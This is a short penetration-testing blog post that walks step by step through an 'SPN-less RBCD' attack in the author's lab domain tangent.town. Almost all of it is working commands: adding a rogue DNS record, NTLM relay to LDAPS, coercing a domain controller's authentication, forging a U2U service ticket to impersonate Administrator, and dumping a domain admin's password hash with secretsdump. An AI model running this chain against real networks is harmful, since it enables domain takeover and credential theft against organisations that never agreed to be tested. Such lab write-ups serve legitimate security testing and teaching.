Today’s prelude to a tale of pentest pwnage talks about something called “spnless RBCD” (resource-based constrained delegation).  Here are the key steps:

Lets use my lab of tangent.town as an example and say that TT-DC02 is where Webdav is enabled.

Add a DNS record that points to your testing box (I think this is required so the victim systems consider you to be in the “Trusted Zone”):

dnstool.py -u 'tangent\7MinSec' -p 'MySuperSecurePassword' -r ROGUE-DNS-RECORD -a add -t A -d IP.OF.ATTACKING.BOX IP.OF.A.DOMAIN-CONTROLLER

Setup the relay to TT-DC02:

ntlmrelayx.py -smb2support -t ldaps://tt-dc02.tangent.town --delegate-access --escalate-user 7minsec

Coerce TT-DC01 to auth to your Kali box:

coercer coerce -u 7MinSec -p 'MySuperSecurePassword' -t TT-DC01 -l ROGUE-DNS-RECORD --auth-type http

If it worked your ntlmrelay window should say something like 7minsec can now impersonate users on TT-DC01$ via S4U2Proxy

Then I followed https://medium.com/@offsecdeer/a-practical-guide-to-rbcd-exploitation-a3f1a47267d5 to perform SPN-less RBCD:

getTGT.py -hashes :$(pypykatz crypto nt 'MySuperSecurePassword') tangent.town/7minsec

Take note of the session key from this command:

describeTicket.py 7minsec.ccache | grep 'Ticket Session Key'

Change the account password:

smbpasswd.py -newhashes :TICKET-SESSION-KEY-GOES-HERE tangent.town/7minsec:MySuperSecurePassword@tt-dc01.tangent.town

Perform U2U:

KRB5CCNAME=7minsec.ccache getST.py -u2u -impersonate Administrator -spn host/tt-dc01 -k -no-pass tangent.town/7minsec

Profit! In this example, stealing a domain admin (Tommy’s) hash:

KRB5CCNAME='tt-dc01$@host_tt-dc01@TANGENT.TOWN.ccache' secretsdump.py -k -no-pass @tt-dc01 -just-dc-user tommy

Written by: Brian Johnson

Share on socials: